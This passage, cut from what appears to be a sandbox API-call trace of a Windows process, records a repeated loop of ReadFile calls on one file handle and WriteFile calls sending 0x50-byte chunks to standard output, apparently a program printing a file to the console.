lpFileSizeHigh=0x2ce098*=0x0) returned 0x1632 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.772] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.772] GetFileType (hFile=0x4c) returned 0x1 [0131.772] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.772] GetFileType (hFile=0x4c) returned 0x1 [0131.772] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.772] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] GetFileType (hFile=0x4c) returned 0x1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] GetFileType (hFile=0x4c) returned 0x1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.774] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.776] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.777] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.778] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.779] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.780] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.781] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c 